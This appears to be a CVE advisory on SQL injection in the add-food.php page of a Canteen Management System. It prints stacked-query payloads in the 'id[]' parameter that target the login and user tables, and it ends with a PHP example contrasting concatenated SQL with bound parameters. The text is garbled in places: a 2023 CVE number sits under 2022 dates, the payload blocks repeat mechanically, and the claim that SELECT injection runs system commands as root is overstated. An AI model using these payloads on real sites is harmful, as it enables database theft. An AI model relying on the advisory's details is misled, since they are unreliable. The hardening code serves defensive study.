CVE-2022-43049: The Canteen Management System Project v1.0 had a SQL injection vulnerability.

This issue allows attackers to execute SQL commands with root privileges. In the example below, an SQL injection vulnerability is detected in the /youthappam/add-food.php page when it accepts the input 'id[]' with a value of ';select * from `login` where `id[]`=1'. This input could be exploited to execute system commands with root privileges:

1. -------------------------- Add Food --------------------------
> Select * from `login` where `id[]`=1;
-- SQL Injection Exploit --
-- Description: Type: Add Food
> id[]=;select * from `login` where `id[]`=1;
-- SQL Injection Exploit --
-- Description: Type: Add Food
> id[]=1;select * from `login` where `id[]`=1;
-- SQL Injection Exploit --
-- Description: Type: Add Food

CVE-2023-43050

This issue allows attackers to execute SQL commands with root privileges. In the example below, an SQL injection vulnerability is detected in the /youthappam/add-food.php page when it accepts the input 'id[]' with a value of ';select * from `user` where `id[]`=1'. This input could be exploited to execute system commands with root privileges:

1. -------------------------- Add Food --------------------------
> Select * from `user` where `id[]`=1;
-- SQL Injection Exploit --
-- Description: Type: Add Food
> id[]=;select * from `user` where `id[]`=1;
-- SQL Injection Exploit --
-- Description: Type: Add Food
> id[]=1;select * from `user` where `id[]`=1;
-- SQL Injection Exploit --
-- Description: Type: Add Food

SQL Injection

SQL Injection is a type of injection attack in which an attacker inserts malicious SQL commands into the queries a website sends to its database. The most common route is user input that is sent to the database as part of a query. This allows attackers to access sensitive information stored in the database, such as usernames and passwords.
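
The concatenation pattern described above, next to a parameterized handler for an array parameter such as id[], as an added example that is not the project's own code. The `food` table, its columns and both function names are hypothetical; the code assumes PHP 8 with the pdo_sqlite extension.

```php
<?php
declare(strict_types=1);

// Constructed in-memory database; the `food` table and its columns are hypothetical.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE food (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO food (id, name) VALUES (1, 'rice'), (2, 'dal')");

// Weak pattern: request values are pasted into the SQL text, so the
// structure of the statement is decided by whoever sent the request.
function buildQueryUnsafe(array $ids): string
{
    return 'SELECT name FROM food WHERE id IN (' . implode(',', $ids) . ')';
}

// Hardened pattern: accept only an array of decimal integers, then bind
// each one to a placeholder so it is never parsed as SQL.
function fetchFoodSafe(PDO $pdo, mixed $ids): array
{
    if (!is_array($ids) || $ids === []) {
        throw new InvalidArgumentException('id[] must be a non-empty array');
    }
    $clean = [];
    foreach ($ids as $v) {
        if (!is_string($v) || !ctype_digit($v)) {
            throw new InvalidArgumentException('id[] values must be integers');
        }
        $clean[] = (int) $v;
    }
    $marks = implode(',', array_fill(0, count($clean), '?'));
    $stmt = $pdo->prepare("SELECT name FROM food WHERE id IN ($marks)");
    $stmt->execute($clean);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: one well-formed, one carrying the value quoted in the advisory.
$good = ['1', '2'];
$bad  = ['1;select * from `login` where `id[]`=1'];

// Compare what each pattern does with the same request values.
echo buildQueryUnsafe($bad), "\n";
print_r(fetchFoodSafe($pdo, $good));
try {
    fetchFoodSafe($pdo, $bad);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```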

Timeline

Published on: 11/07/2022 22:15:00 UTC
Last modified on: 11/08/2022 15:27:00 UTC
